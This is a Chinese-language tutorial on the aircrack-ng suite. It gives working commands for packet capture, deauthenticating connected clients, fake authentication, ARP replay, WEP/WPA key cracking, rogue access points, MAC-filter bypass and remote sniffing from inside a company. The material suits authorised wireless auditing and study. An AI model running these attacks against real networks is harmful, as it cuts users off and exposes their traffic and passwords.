1. 無線滲透和審計神器:aircrack-suit
- 包含各種功能的工具套件
- 網絡監測
- 嗅探抓包
- 包注入
- 密碼破解
-------------------------突破網絡邊界-----------------
0x1 .aircrack-ng基礎
service network-manager stop airmon-ng #列出驅動信息、芯片信息 airmon-ng check #監測與該軟件可能起沖突的進程,后面直接加kill就行! airmon-ng check kill -----------准備就緒,啟動偵聽---------- airmon-ng start wlan0 #airmon-ng stop wlan0mon iwconfig iwlist wlan0mon channel #查看監聽網口所在的channel
#啟動monitor后的mon MAC地址變為前面是真實模式下地址后面為一長串假的00-00-00-00-00-00..
0x2 airodump-ng抓包
有了監聽網卡我們既可以抓無線數據包了,當然你可以用wireshark or tcpdump,but這些數據包太多分析太復雜...
這個套件提供了一個專門的抓包工具。
對了,其實上面在開啟監聽的時候可以加一個信道號指定工作信道:airmon-ng start wlan0 1
開始抓包:
airodump-ng wlan0mon #ctrl+c終止
airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap #指定信道、AP—MAC 、保存數據包
airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap --ivs #只保存ivs
#注意這時運行這個命令,即使你指定了信道但是抓包還是會不限於信道而是在所有信道里輪訓!
參數解釋:
#若bssid是(not associated)而probes的參數就是xxx :意思就是這個客戶端以前連過的AP名稱即ESSID (隱私泄露)
#附排錯信息:
不顯示任何AP和STA信息:
- 物理機使用內置無線網卡確保bios已啟用
- 確認無線網卡在正常managed模式下正常工作
- 嘗試禁用network-manager服務
- 嘗試卸載rmmod和重新加載modprobe驅動
工作一段時間后airodump-ng無法繼續抓包
- airmon-ng check kill
- 確認wpa_supplicant進程已停止
0x3 aireplay-ng注入
root@kali:~# aireplay-ng Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe http://www.aircrack-ng.org usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit -D : disable AP detection Replay options: -x nbpps : number of packets per second -p fctrl : set frame control word (hex) -a bssid : set Access Point MAC address -c dmac : set Destination MAC address -h smac : set Source MAC address -g value : change ring buffer size (default: 8) -F : choose first matching packet Fakeauth attack options: -e essid : set target AP SSID -o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives -Q : send reassociation requests -y prga : keystream for shared key auth -T n : exit after retry fake auth request n time Arp Replay attack options: -j : inject FromDS packets Fragmentation attack options: -k IP : set destination IP in fragments -l IP : set source IP in fragments Test attack options: -B : activates the bitrate test Source options: -i iface : capture packets from this interface -r file : extract packets from this pcap file Miscellaneous options: -R : disable /dev/rtc usage --ignore-negative-one : if the interface's channel can't be determined, ignore the mismatch, needed for unpatched cfg80211 Attack modes (numbers can still be used): --deauth count : deauthenticate 1 or all stations (-0) --fakeauth delay : fake authentication with AP (-1) --interactive : interactive frame selection (-2) --arpreplay : standard ARP-request replay (-3) --chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5) --caffe-latte : query a client for new IVs (-6) --cfrag : fragments against a client (-7) --migmode : attacks WPA migration mode (-8) --test : tests injection and quality (-9) --help : Displays this usage screen
這個命令可以向無線網絡中注入數據包:偽造身份驗證;強制身份驗證;抓包重放
使用方法:
airrplay-ng <options><interface name>
Filter命令選項(除0、1兩種模式):過濾數據包用的選項指定
Replay命令選項:重放數據包的選項指定
Aireplay-ng 的 6 種攻擊模式詳解 -0 Deautenticate 沖突模式 使已經連接的合法客戶端強制斷開與路由端的連接,使其重新連接。在重新連接過程中獲得驗證數據包,從而產生有效 ARP request。 如果一個客戶端連在路由端上,但是沒有人上網以產生有效數據,此時,即使用-3 也無法產生有效 ARP request。所以此時需要用-0 攻擊模式配合,-3 攻擊才會被立刻激活。 aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0 參數說明: 【-0】:沖突攻擊模式,后面跟發送次數(設置為 0,則為循環攻擊,不停的斷開連接,客戶端無法正常上網) 【-a】:設置 ap 的 mac 【-c】:設置已連接的合法客戶端的 mac。 如果不設置-c,則斷開所有和 ap 連接的合法客戶端。 aireplay-ng -3 -b <ap mac> -h <my mac> wifi0 注:使用此攻擊模式的前提是必須有通過認證的合法的客戶端連接到路由器 -1 fakeauth count 偽裝客戶端連接 這種模式是偽裝一個客戶端和 AP 進行連接。 這步是無客戶端的研究學習的第一步,因為是無合法連接的客戶端,因此需要一個偽裝客戶端來和路由器相連。為讓 AP 接受數據包,必須使自己的網卡和 AP 關聯。如果沒有關聯的話,目標 AP 將忽略所有從你網卡發送的數據包,IVS 數據將不會產生。 用-1 偽裝客戶端成功連接以后才能發送注入命令,讓路由器接受到注入命令后才可反饋數據從而產生 ARP 包。 aireplay- ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0 參數說明: 【-1】:偽裝客戶端連接模式,后面跟延時 【-e】:設置 ap 的 essid 【-a】:設置 ap 的 mac 【-h】:設置偽裝客戶端的網卡 MAC(即自己網卡 mac) -2 Interactive 交互模式 這種攻擊模式是一個抓包和提數據發攻擊包,三種集合一起的模式 1.這種模式主要用於研究學習無客戶端,先用-1 建立虛假客戶端連接然后直接發包攻擊 , aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0 參數說明: 【-2】:交互攻擊模式 【-p】:設置控制幀中包含的信息(16 進制),默認采用 0841 【-c】:設置目標 mac 地址 【-b】:設置 ap 的 mac 地址 【-h】:設置偽裝客戶端的網卡 MAC(即自己網卡 mac) 2.提取包,發送注入數據包 aireplay-ng -2 –r <file> -x 1024 wifi0 發包攻擊.其中,-x 1024 是限定發包速度,避免網卡死機,可以選擇 1024。 -3 ARP-request 注入攻擊模式 這種模式是一種抓包后分析重發的過程 這種攻擊模式很有效。既可以利用合法客戶端,也可以配合-1 利用虛擬連接的偽裝客戶端。如果有合法客戶端那一般需要等幾分鍾,讓合法客戶端和 ap 之間通信,少量數據就可產生有效 ARP request 才可利用-3模式注入成功。如果沒有任何通信存在,不能得到 ARP request.,則這種攻擊就會失敗。 如果合法客戶端和ap之間長時間內沒有 ARP request,可以嘗試同時使用-0 攻擊. 如果沒有合法客戶端,則可以利用-1 建立虛擬連接的偽裝客戶端,連接過程中獲得驗證數據包,從而產生有效 ARP request。再通過-3 模式注入。 aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0 參數說明: 【-3】:arp 注入攻擊模式 【-b】:設置 ap 的 mac 【-h】:設置 【-x】:定義每秒發送數據戶包的數量,但是最高不超過 1024,建議使用 512(也可不定義) -4 Chopchop 攻擊模式 用以獲得一個包含密鑰數據的 xor 文件 這種模式主要是獲得一個可利用包含密鑰數據的 xor 文件,不能用來解密數據包。而是用它來產生一個新的數據包以便我們可以進行注入。 aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 參數說明: 【-b】:設置需要研究學習的 AP 的 mac 【-h】:設置虛擬偽裝連接的 mac(即自己網卡的 mac) -5 fragment 碎片包攻擊模式 用以獲得 PRGA(包含密鑰的后綴為 xor 的文件) 這種模式主要是獲得一個可利用 PRGA,這里的 PRGA 並不是 wep key 數據,不能用來解密數據包。而是用它來產生一個新的數據包以便我們可以進行注入。其工作原理就是使目標 AP 重新廣播包,當 AP 重廣播時,一個新的 IVS 將產生,我們就是利用這個來研究學習 ! aireplay-ng -5 -b <ap mac> -h <my mac> wifi0 【-5】:碎片包攻擊模式 【-b】:設置 ap 的 mac 【-h】:設置虛擬偽裝連接的 mac(即自己網卡的 mac) Packetforge-ng:數據包制造程序 Packetforge-ng <mode> <options>Mode 【-0】:偽造 ARP 包 packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp 參數說明: 【-0】:偽裝 arp 數據包 【-a】:設置 ap 的 mac 【-h】設置虛擬偽裝連接的 mac(即自己的 mac) 【-k】<ip[:port]>說明:設置目標文件 IP 和端口 【-l】<ip[:port]>說明:設置源文件 IP 和端口 【-y】<file>說明:從 xor 文件中讀取 PRGA。后面跟 xor 的文件名。 【-w】設置偽裝的 arp 包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 研究學習主程序 Aircrack-ng [optin] <.cap/.ivs file>Optin aircrack-ng -n 64 -b <ap mac> name-01.ivs ) 參數說明: 【-n】:設置 WEP KEY 長度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap 參數說明: 【-x】:設置為暴力研究學習模式 【-f】:設置復雜程度,wep 密碼設置為 1,wpa 密碼設置為 2 aircrack-ng -w password.txt ciw.cap 【-w】:設置為字典研究學習模式,后面跟字典文件,再后面跟是我們即時保存的那個捕獲到 WPA 驗證的抓包文件。
基本測試:
例如:-9 是test是否可以注入包---廣播包
aireplay-ng -9 wlan0mon
向隱藏AP/指定SSID注入--單播包
aireplay-ng -9 -e lponexr -a EC:2B:3D:4F:2R:4E wlan0mon
#附排錯
- aireplay-ng命令掛起無輸出:無線網卡與AP工作在不同信道
0x4 airbase-ng 偽造AP
airbase-ng --essid KFC -c 11 wlan0mon #open airbase-ng --essid KFC -c 11 -w key wlan0mon #wep airbase-ng --essid KFC -c 11 -z 2 wlan0mon #wpa1 airbase-ng --essid KFC -c 11 -Z 4 wlan0mon #wpa2
0x5 Mac地址綁定攻擊
其實MAC地址綁定不是一種安全機制,如路由器的MAC地址過濾。
可以通過修改MAC繞過過濾。
ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 ifconfig wlan0 up ifconfig
#需要注意的是此時兩個相同的MAC再同一網段內,同時上網會出現丟包的現象~
root@kali:~# ifconfig wlan0 down root@kali:~# macchanger -m 00:11:22:33:44:55 wlan0 Current MAC: 00:a1:b0:60:45:20 (unknown) Permanent MAC: 00:a1:b0:60:45:20 (unknown) New MAC: 00:11:22:33:44:55 (CIMSYS Inc) root@kali:~# ifconfig wlan0 up root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.56.134 netmask 255.255.255.0 broadcast 192.168.56.255 inet6 fe80::20c:29ff:fef0:7b6e prefixlen 64 scopeid 0x20<link> ether 00:0c:29:f0:7b:6e txqueuelen 1000 (Ethernet) RX packets 1273247 bytes 1914796653 (1.7 GiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 247430 bytes 15079857 (14.3 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 42 bytes 2478 (2.4 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 42 bytes 2478 (2.4 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 00:11:22:33:44:55 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@kali:~#
補充一些不是很常用的命令:
1.airdecap-ng
被wep和wpa加密的數據包我們用wireshark只能看到802.11協議,里面我的數據都被加密了,用就這個命令就可解密里面的部分數據生成1-dec.cap,用抓包工具看起來更舒適~
解密WEP加密數據
aidecap-ng -w <WEP key> -b <AP MAC> 1.pcap
必須有與AP建立關聯關系
解密WPA加密數據
airdecap-ng -e kifi -p <PSK> -b <AP MAC> 1.pcap
抓包文件中必須包含4步握手信息,否則無解
2.airserv-ng
可以將你的無線網卡作為遠程服務器,遠程監聽這個網卡。就是使用網絡提供無線網卡服務器(有的網卡不支持),啟動無線偵聽
使用場景:黑客將網卡放到企業內部,遠程監聽
服務器端:
airserv-ng -p 3333 -d wlan0mon
客戶端:
airodump-ng 192.168.1.1:3333
# 注意某些防火牆可能會影響C/S間的通信
3.airtun-ng
無線入侵檢測wIDS
- 無線密碼和BSSID
- 需要獲取握手信息
snort開源ids,發現入侵的異常流量
類似交換機的鏡像接口,airtun-ng形成隧道端口,可以把無線的所有流量都鏡像到隧道接口上,再在隧道接口連一個IDS系統(或者直接抓包重放到ids)
把所有AP與客戶端的流量都拷貝一份。
#wep: airtun-ng -a <AP MAC> -w SKA wlan0mon #wpa airtun-ng -a <AP MAC> -p PSK -e KFC-FREE wlan0mon ifconfig at0 up #需要四步握手
中繼和重放
Repeate/Replay
Repeate • WDS/Bridge • 擴展無線偵聽的距離 • 要求兩塊網卡都置為monitor模式 • airtun-ng -a <AP MAC> --repeat --bssid <AP MAC> -i wlan0mon wlan2mon • wlan0mon:收包網卡 • wlan2mon: 發包網卡 • -a:發包的源地址 • --bssid:過濾只發指定源地址的包(可選)
Replay
• 將抓取的CAP文件重放到指定網卡
• airtun-ng -a <Source MAC> -r 1.cap <interface>
4.besside-ng
只針對wpa發Deauthentication,類似aireplay-ng
5.fern-wifi-cracker
圖形化的aircrack-ng